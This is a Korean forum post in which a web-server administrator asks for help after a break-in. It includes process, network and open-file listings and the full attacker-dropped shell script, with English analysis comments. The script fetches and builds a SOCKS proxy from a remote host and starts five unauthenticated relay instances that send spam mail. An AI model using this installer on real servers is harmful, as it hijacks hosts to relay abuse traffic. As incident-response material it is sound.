[해킹피해질문] /usr/include/sdk386/sdk386/s
안녕하십니까? 궁금하여 본의아니게 질문을 드려보게 됩니다.
리눅스 시스템으로 웹서버를 운영 중인데, 금일 아침 서비스가 제대로 이루어지지 않아 확인하여 보니 다음과 같은 점을 발견하였습니다.
심각한 피해는 없었으나, 해당 서버의 서비스 기능은 상실되네요.
일종의 해킹피해를 받은지라, 해당 내용을 좀 찾아보았는데, 쉽지가 않아 도움을 요청해 보게 됩니다.
# ps -ef
root 25478 1 1 Oct01 ? 01:23:10 ./s -f s01.cfg
root 25480 1 2 Oct01 ? 01:29:50 ./s -f s02.cfg
root 25481 1 2 Oct01 ? 01:34:18 ./s -f s03.cfg
root 25482 1 2 Oct01 ? 01:27:30 ./s -f s04.cfg
root 25483 1 2 Oct01 ? 01:34:13 ./s -f s05.cfg
root 25484 25480 0 Oct01 ? 00:04:58 ./s -f s02.cfg
root 25485 25478 0 Oct01 ? 00:04:56 ./s -f s01.cfg
root 25486 25480 0 Oct01 ? 00:00:06 ./s -f s02.cfg
root 25487 25478 0 Oct01 ? 00:00:05 ./s -f s01.cfg
root 25488 25480 0 Oct01 ? 00:00:06 ./s -f s02.cfg
root 25489 25478 0 Oct01 ? 00:00:06 ./s -f s01.cfg
root 25490 25478 0 Oct01 ? 00:00:05 ./s -f s01.cfg
root 25491 25481 0 Oct01 ? 00:05:03 ./s -f s03.cfg
root 25492 25481 0 Oct01 ? 00:00:06 ./s -f s03.cfg
(생략)
# netstat -an
tcp 0 1 220.73.139.105:49982 216.93.66.110:25 SYN_SENT
tcp 3 0 220.73.139.105:39135 64.127.123.83:51300 ESTABLISHED
tcp 0 1 220.73.139.105:50103 216.93.66.110:25 SYN_SENT
tcp 0 0 220.73.139.105:59980 64.156.215.19:25 ESTABLISHED
tcp 0 0 220.73.139.105:42082 194.7.83.67:25 TIME_WAIT
tcp 0 0 220.73.139.105:44708 209.223.136.74:25 TIME_WAIT
tcp 0 1 220.73.139.105:45848 209.245.216.210:25 SYN_SENT
tcp 0 1 220.73.139.105:57142 16.114.1.31:25 SYN_SENT
tcp 0 0 220.73.139.105:37369 209.68.2.152:25 TIME_WAIT
tcp 0 0 220.73.139.105:15422 64.127.123.83:47298 ESTABLISHED
tcp 0 1 220.73.139.105:41522 15.1.28.240:25 SYN_SENT
tcp 0 0 220.73.139.105:59567 64.156.215.19:25 ESTABLISHED
tcp 0 0 220.73.139.105:35698 200.35.64.88:25 TIME_WAIT
tcp 0 0 220.73.139.105:59622 64.156.215.19:25 ESTABLISHED
tcp 0 0 220.73.139.105:59621 64.156.215.19:25 ESTABLISHED
tcp 0 0 220.73.139.105:43444 213.153.132.4:25 TIME_WAIT
tcp 0 0 220.73.139.105:15422 64.127.123.83:44995 ESTABLISHED
tcp 0 1 220.73.139.105:49197 216.93.66.110:25 SYN_SENT
tcp 0 1 220.73.139.105:38798 12.32.4.2:25 SYN_SENT
(중략)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 10 [ ] DGRAM 772 /dev/log
unix 2 [ ] DGRAM 80291198
unix 2 [ ] DGRAM 80288165
unix 2 [ ] DGRAM 80260717
unix 2 [ ] DGRAM 80255763
unix 2 [ ] DGRAM 80246768
unix 2 [ ] DGRAM 873
unix 2 [ ] DGRAM 820
unix 2 [ ] DGRAM 787
unix 2 [ ] STREAM CONNECTED 480
# lsof -p 25492
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
s 25492 root cwd DIR 8,5 0 913257 /usr/include/sdk386/sdk386 (deleted)
s 25492 root rtd DIR 8,3 4096 2 /
s 25492 root txt REG 8,5 464052 913585 /usr/include/sdk386/sdk386/s (deleted)
s 25492 root mem REG 8,3 485171 480962 /lib/ld-2.2.4.so
s 25492 root mem REG 8,3 261460 480996 /lib/libnss_files-2.2.4.so
s 25492 root mem REG 8,3 85115 480973 /lib/libcrypt-2.2.4.so
s 25492 root mem REG 8,3 65997 480975 /lib/libdl-2.2.4.so
s 25492 root mem REG 8,3 5772268 176355 /lib/i686/libc-2.2.4.so
s 25492 root 0u CHR 3,0 68706 /dev/ttyp0
s 25492 root 1w CHR 1,3 65258 /dev/null
s 25492 root 2u IPv4 86132351 TCP www105.mk.co.kr:15422->64.127.123.83:34664 (CLOSE_WAIT)
s 25492 root 3u IPv4 86132379 TCP www105.mk.co.kr:34664->mc2.bay6.hotmail.com:smtp (SYN_SENT)
s 25492 root 4u REG 8,3 0 210621 /tmp/sockslockXXXXsIsT4y (deleted)
s 25492 root 7u unix 0xd9114500 68943947 socket
s 25492 root 9w FIFO 0,6 68943948 pipe
(생략)
# ls -al /usr/include/sdk386/sdk386
drwxr-xr-x 2 root root 4096 Oct 4 10:02 .
drwxr-xr-x 3 root root 4096 Oct 4 09:56 ..
-rwxr-xr-x 1 root root 8180 Oct 4 09:56 c
-rwxr-xr-x 1 root root 464052 Oct 4 09:56 s
-rw-r--r-- 1 root root 342 Oct 4 09:56 s01.cfg
-rw-r--r-- 1 root root 342 Oct 4 09:56 s02.cfg
-rw-r--r-- 1 root root 342 Oct 4 09:56 s03.cfg
-rw-r--r-- 1 root root 342 Oct 4 09:56 s04.cfg
-rw-r--r-- 1 root root 342 Oct 4 09:56 s05.cfg
# cat c
#!/bin/sh
# Attacker-dropped installer / control script ("c") recovered from
# /usr/include/sdk386/sdk386 on the compromised host. It installs, configures and
# (re)starts a SOCKS proxy: the binary "s" is Dante's sockd (see the
# dante-1.1.14 download and `mv sockd/sockd ../$exec` in sinstbin below).
# Annotated here for incident-response reading only; the code is left untouched.
#
# Layout: variables, then helper functions, then a `case "$1"` dispatcher at the
# bottom (start|stop|sinstex|sinstbin|srem|cinst|crem|cupd). Every dispatcher
# branch first cd's into $path/$pathadd, so all relative paths below are
# relative to that directory.
# Never modified anywhere below, so `exit $return` at the end is always exit 0.
return=0
# The compromised host's own address (the local address in the netstat output).
server=220.73.139.105
# Host the binary / source tarball is fetched from. Shown as "xxx" on this page --
# either redacted by the poster or never filled in; cannot tell which from here.
insthost=xxx
path=/usr/include/sdk386
pathadd=sdk386
# Name of the proxy binary; also the argument to `killall -9` in several functions.
exec=s
# Per-instance listen ("internal") and outbound ("external") addresses -- all five
# instances use the host's own address and differ only by listen port.
ip01=220.73.139.105
ip02=220.73.139.105
ip03=220.73.139.105
ip04=220.73.139.105
ip05=220.73.139.105
config01=s01.cfg
config02=s02.cfg
config03=s03.cfg
config04=s04.cfg
config05=s05.cfg
# Listen ports of the five instances. 15422 and 39135 (port03/port04) are the local
# ports with ESTABLISHED connections from 64.127.123.83 in the netstat output.
port01=34976
port02=41302
port03=15422
port04=39135
port05=27236
# Fragments of the sockd.conf files written by cinst/cupd. The assembled file for
# instance 01 is shown at the end of the post (`cat s01.cfg`).
cline01="logoutput: stdout"
c01line02="internal: $server port = $port01"
c02line02="internal: $server port = $port02"
c03line02="internal: $server port = $port03"
c04line02="internal: $server port = $port04"
c05line02="internal: $server port = $port05"
c01line03="external: $ip01"
c02line03="external: $ip02"
c03line03="external: $ip03"
c04line03="external: $ip04"
c05line03="external: $ip05"
# No client authentication.
cline04="method: none"
cline05="client pass {"
# Client-side allow rules: only these four source networks may connect to the proxy.
# 64.127.123.0/24 matches the 64.127.123.83 peer seen in netstat/lsof above.
cline06rule01="from: 64.127.123.0/24 to: 0.0.0.0/0"
cline06rule02="from: 83.69.191.0/24 to: 0.0.0.0/0"
cline06rule03="from: 67.18.251.96/27 to: 0.0.0.0/0"
cline06rule04="from: 207.150.169.96/28 to: 0.0.0.0/0"
cline07="}"
cline08="pass {"
# Socks-side rule: any accepted client may reach any destination.
cline09rule01="from: 0.0.0.0/0 to: 0.0.0.0/0"
cline10="}"
# cd into the install directory ($path/$pathadd = /usr/include/sdk386/sdk386, the
# directory listed with `ls -al` above). Called first by every dispatcher branch.
# No error check: if the cd fails, the relative paths used later (./$exec,
# $config0N, wget output) resolve against whatever the current directory is.
path () {
cd $path/$pathadd
}
# Replace the proxy binary with a prebuilt one fetched over plain HTTP.
# Globals read: path, pathadd, exec, insthost. Runs inside the install dir.
sinstex () {
# $path/sk is a separate binary one level above the install dir; it is not shown
# anywhere on this page. Every kill/replace step in this script is bracketed by
# `sk p 0` ... `sk p 1`, so it presumably toggles some state around that step --
# what that state is cannot be determined from here. Preserve it for analysis.
$path/sk p 0
# killall by name: this kills every process called "s" on the host, not just
# this proxy's instances.
killall -9 $exec
$path/sk p 1
rm -f $path/$pathadd/$exec
# Fetched into the current directory; nothing verifies what arrives.
wget http://$insthost/software/$exec
chmod +x $exec
}
# Replace the proxy binary by building Dante 1.1.14 from source on the victim
# host and renaming its sockd to "$exec" (i.e. "s"). This is what identifies the
# 464052-byte "s" in the directory listing as a SOCKS server -- presumably built
# this way, although the page does not show which install path was used.
# Globals read: path, pathadd, exec, insthost. Runs inside the install dir.
sinstbin () {
# Same unknown helper bracket as in sinstex; see the note there.
$path/sk p 0
killall -9 $exec
$path/sk p 1
rm -f $path/$pathadd/$exec
wget http://$insthost/software/dante-1.1.14.tar.gz
tar -zxf dante-1.1.14.tar.gz
cd dante-1.1.14
# Requires a working compiler toolchain on the victim; no step checks that
# configure/make succeeded before the mv below.
./configure
make
mv sockd/sockd ../$exec
cd ..
# Build tree and tarball are removed afterwards, leaving only the renamed binary.
rm -rf dante-1.1.14 dante-1.1.14.tar.gz
chmod +x $exec
}
# Stop the proxy and delete its binary (configs are left in place; see crem).
# Globals read: path, pathadd, exec.
srem () {
# Same unknown helper bracket as in sinstex; see the note there.
$path/sk p 0
killall -9 $exec
$path/sk p 1
rm -f $path/$pathadd/$exec
}
# Write the five sockd.conf files (s01.cfg .. s05.cfg) line by line into the
# current directory. Each file gets: logoutput, internal (listen addr/port),
# external, method, four `client pass { from: <net> to: 0.0.0.0/0 }` blocks, and
# one `pass { from: 0.0.0.0/0 to: 0.0.0.0/0 }` block. The result for instance 01
# is the `cat s01.cfg` output at the end of the post.
# Globals read: cline*, c0Nline*, config0N. Does not stop or restart the proxy.
cinst () {
echo $cline01 > $config01
echo $cline01 > $config02
echo $cline01 > $config03
echo $cline01 > $config04
echo $cline01 > $config05
echo $c01line02 >> $config01
echo $c02line02 >> $config02
echo $c03line02 >> $config03
echo $c04line02 >> $config04
echo $c05line02 >> $config05
echo $c01line03 >> $config01
echo $c02line03 >> $config02
echo $c03line03 >> $config03
echo $c04line03 >> $config04
echo $c05line03 >> $config05
echo $cline04 >> $config01
echo $cline04 >> $config02
# Duplicate of the previous line: config02 receives `method: none` twice.
# Looks like a copy-paste slip in the attacker's script.
echo $cline04 >> $config02
echo $cline04 >> $config03
echo $cline04 >> $config04
echo $cline04 >> $config05
# client pass block 1: 64.127.123.0/24
echo $cline05 >> $config01
echo $cline05 >> $config02
echo $cline05 >> $config03
echo $cline05 >> $config04
echo $cline05 >> $config05
echo $cline06rule01 >> $config01
echo $cline06rule01 >> $config02
echo $cline06rule01 >> $config03
echo $cline06rule01 >> $config04
echo $cline06rule01 >> $config05
echo $cline07 >> $config01
echo $cline07 >> $config02
echo $cline07 >> $config03
echo $cline07 >> $config04
echo $cline07 >> $config05
# client pass block 2: 83.69.191.0/24
echo $cline05 >> $config01
echo $cline05 >> $config02
echo $cline05 >> $config03
echo $cline05 >> $config04
echo $cline05 >> $config05
echo $cline06rule02 >> $config01
echo $cline06rule02 >> $config02
echo $cline06rule02 >> $config03
echo $cline06rule02 >> $config04
echo $cline06rule02 >> $config05
echo $cline07 >> $config01
echo $cline07 >> $config02
echo $cline07 >> $config03
echo $cline07 >> $config04
echo $cline07 >> $config05
# client pass block 3: 67.18.251.96/27
echo $cline05 >> $config01
echo $cline05 >> $config02
echo $cline05 >> $config03
echo $cline05 >> $config04
echo $cline05 >> $config05
echo $cline06rule03 >> $config01
echo $cline06rule03 >> $config02
echo $cline06rule03 >> $config03
echo $cline06rule03 >> $config04
echo $cline06rule03 >> $config05
echo $cline07 >> $config01
echo $cline07 >> $config02
echo $cline07 >> $config03
echo $cline07 >> $config04
echo $cline07 >> $config05
# client pass block 4: 207.150.169.96/28
echo $cline05 >> $config01
echo $cline05 >> $config02
echo $cline05 >> $config03
# Duplicate of the previous line: config03 gets `client pass {` twice before
# rule04 but only one closing brace, so that file ends up with an unbalanced
# block. Whether sockd still accepts it is not shown on this page.
echo $cline05 >> $config03
echo $cline05 >> $config04
echo $cline05 >> $config05
echo $cline06rule04 >> $config01
echo $cline06rule04 >> $config02
echo $cline06rule04 >> $config03
echo $cline06rule04 >> $config04
echo $cline06rule04 >> $config05
echo $cline07 >> $config01
echo $cline07 >> $config02
echo $cline07 >> $config03
echo $cline07 >> $config04
echo $cline07 >> $config05
# socks-side pass block: any accepted client may reach any destination.
echo $cline08 >> $config01
echo $cline08 >> $config02
echo $cline08 >> $config03
echo $cline08 >> $config04
echo $cline08 >> $config05
echo $cline09rule01 >> $config01
echo $cline09rule01 >> $config02
echo $cline09rule01 >> $config03
echo $cline09rule01 >> $config04
echo $cline09rule01 >> $config05
echo $cline10 >> $config01
echo $cline10 >> $config02
echo $cline10 >> $config03
echo $cline10 >> $config04
echo $cline10 >> $config05
# Matches the -rw-r--r-- mode of the five .cfg files in the directory listing.
chmod 644 $config01 $config02 $config03 $config04 $config05
}
# Stop the proxy, delete the five config files and rewrite them. The body after
# the `rm -f` is a near-verbatim copy of cinst (same fragments, same order) with
# its own copy-paste duplicates, noted inline. The s01.cfg shown at the end of the
# post has `method: none` once, which is consistent with cinst rather than cupd
# having produced it -- an inference, not something the page states.
# Globals read: path, exec, cline*, c0Nline*, config0N.
cupd () {
# Same unknown helper bracket as in sinstex; see the note there.
$path/sk p 0
killall -9 $exec
$path/sk p 1
rm -f $config01 $config02 $config03 $config04 $config05
echo $cline01 > $config01
echo $cline01 > $config02
echo $cline01 > $config03
echo $cline01 > $config04
echo $cline01 > $config05
echo $c01line02 >> $config01
echo $c02line02 >> $config02
echo $c03line02 >> $config03
echo $c04line02 >> $config04
echo $c05line02 >> $config05
echo $c01line03 >> $config01
echo $c02line03 >> $config02
echo $c03line03 >> $config03
echo $c04line03 >> $config04
echo $c05line03 >> $config05
echo $cline04 >> $config01
# Duplicate of the previous line: config01 receives `method: none` twice.
echo $cline04 >> $config01
echo $cline04 >> $config02
echo $cline04 >> $config03
echo $cline04 >> $config04
echo $cline04 >> $config05
# client pass block 1: 64.127.123.0/24
echo $cline05 >> $config01
echo $cline05 >> $config02
echo $cline05 >> $config03
echo $cline05 >> $config04
echo $cline05 >> $config05
echo $cline06rule01 >> $config01
echo $cline06rule01 >> $config02
echo $cline06rule01 >> $config03
echo $cline06rule01 >> $config04
echo $cline06rule01 >> $config05
echo $cline07 >> $config01
echo $cline07 >> $config02
echo $cline07 >> $config03
echo $cline07 >> $config04
echo $cline07 >> $config05
# client pass block 2: 83.69.191.0/24
echo $cline05 >> $config01
echo $cline05 >> $config02
echo $cline05 >> $config03
echo $cline05 >> $config04
echo $cline05 >> $config05
echo $cline06rule02 >> $config01
echo $cline06rule02 >> $config02
echo $cline06rule02 >> $config03
echo $cline06rule02 >> $config04
echo $cline06rule02 >> $config05
echo $cline07 >> $config01
echo $cline07 >> $config02
echo $cline07 >> $config03
echo $cline07 >> $config04
echo $cline07 >> $config05
# client pass block 3: 67.18.251.96/27
echo $cline05 >> $config01
echo $cline05 >> $config02
echo $cline05 >> $config03
echo $cline05 >> $config04
echo $cline05 >> $config05
echo $cline06rule03 >> $config01
echo $cline06rule03 >> $config02
echo $cline06rule03 >> $config03
echo $cline06rule03 >> $config04
echo $cline06rule03 >> $config05
echo $cline07 >> $config01
echo $cline07 >> $config02
echo $cline07 >> $config03
echo $cline07 >> $config04
echo $cline07 >> $config05
# client pass block 4: 207.150.169.96/28
echo $cline05 >> $config01
echo $cline05 >> $config02
# Duplicate of the previous line: config02 gets `client pass {` twice before
# rule04 but only one closing brace (unbalanced block in that file).
echo $cline05 >> $config02
echo $cline05 >> $config03
echo $cline05 >> $config04
echo $cline05 >> $config05
echo $cline06rule04 >> $config01
echo $cline06rule04 >> $config02
echo $cline06rule04 >> $config03
echo $cline06rule04 >> $config04
echo $cline06rule04 >> $config05
echo $cline07 >> $config01
echo $cline07 >> $config02
echo $cline07 >> $config03
echo $cline07 >> $config04
echo $cline07 >> $config05
# socks-side pass block: any accepted client may reach any destination.
echo $cline08 >> $config01
echo $cline08 >> $config02
echo $cline08 >> $config03
echo $cline08 >> $config04
echo $cline08 >> $config05
echo $cline09rule01 >> $config01
echo $cline09rule01 >> $config02
echo $cline09rule01 >> $config03
echo $cline09rule01 >> $config04
echo $cline09rule01 >> $config05
echo $cline10 >> $config01
echo $cline10 >> $config02
echo $cline10 >> $config03
echo $cline10 >> $config04
echo $cline10 >> $config05
chmod 644 $config01 $config02 $config03 $config04 $config05
}
# Stop the proxy and delete the five config files (the binary stays; see srem).
# Globals read: path, exec, config0N.
crem () {
# Same unknown helper bracket as in sinstex; see the note there.
$path/sk p 0
killall -9 $exec
$path/sk p 1
rm -f $config01 $config02 $config03 $config04 $config05
}
# Stop any running instances, then launch five proxies in the background, one
# per config file. This is the origin of the five `./s -f s0N.cfg` parents with
# PPID 1 in the ps output; the children of each are forked by sockd itself.
# stdout goes to /dev/null (lsof: fd 1w -> /dev/null) while stdin and stderr are
# inherited (lsof: fd 0u -> /dev/ttyp0), consistent with the script having been
# run from an interactive terminal session rather than at boot.
# Globals read: path, exec, config0N.
start () {
# Same unknown helper bracket as in sinstex; see the note there.
$path/sk p 0
killall -9 $exec
$path/sk p 1
# Relative ./$exec: only works because the dispatcher cd'd into the install dir.
./$exec -f $config01 > /dev/null&
./$exec -f $config02 > /dev/null&
./$exec -f $config03 > /dev/null&
./$exec -f $config04 > /dev/null&
./$exec -f $config05 > /dev/null&
}
# Kill every process named "$exec" ("s") -- by name, system-wide -- bracketed by
# the unknown $path/sk helper (see the note in sinstex).
# Globals read: path, exec.
stop () {
$path/sk p 0
killall -9 $exec
$path/sk p 1
}
# Command dispatcher. Each branch cd's into the install directory (`path`), runs
# the matching function and prints a status line to stdout. None of the functions
# report failure, so the status line is printed regardless of what happened.
# An unrecognised or missing argument prints usage and exits 1; every other path
# reaches `exit $return`, which is always 0 ($return is never changed).
case "$1" in start)
path
start
echo service started
;;
stop)
path
stop
echo service stoped
;;
sinstex)
path
sinstex
echo service installed
;;
sinstbin)
path
sinstbin
echo service installed
;;
srem)
path
srem
echo service removed
;;
crem)
path
crem
echo config removed
;;
cupd)
path
cupd
echo config updated
;;
cinst)
path
cinst
echo config installed
;;
*)
echo $"Usage: {sinstex|sinstbin|srem|cinst|crem|cupd|start|stop}"
exit 1
esac
exit $return
# cat s01.cfg
logoutput: stdout
internal: 220.73.139.105 port = 34976
external: 220.73.139.105
method: none
client pass {
from: 64.127.123.0/24 to: 0.0.0.0/0
}
client pass {
from: 83.69.191.0/24 to: 0.0.0.0/0
}
client pass {
from: 67.18.251.96/27 to: 0.0.0.0/0
}
client pass {
from: 207.150.169.96/28 to: 0.0.0.0/0
}
pass {
from: 0.0.0.0/0 to: 0.0.0.0/0
}
혹시 이 내용에 대해 아시는점이 있으신지 조언을 구하고자 합니다.
미리 감사의 말씀을 드립니다.